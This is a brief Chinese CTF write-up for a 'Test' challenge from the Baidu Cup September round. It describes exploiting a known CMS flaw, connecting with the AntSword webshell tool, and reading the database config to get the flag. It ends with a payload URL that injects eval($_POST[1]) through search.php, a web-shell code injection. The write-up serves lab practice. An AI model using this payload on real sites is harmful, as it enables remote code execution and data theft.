“百度杯”CTF比赛 九月场_Test_WriteUp

打开网站

image

考点:已知CMS漏洞利用

在线搜索exploit

image

成功利用

蚁剑连接成功
image

找到flag

image

数据库配置文件

image

成功连接数据库 ,获得flag
image

payload

http://xxxxx/search.php?searchtype=5&tid=&area=eval($_POST[1])

posted @ 2021-12-02 12:42  oldliutou  阅读(41)  评论(0编辑  收藏  举报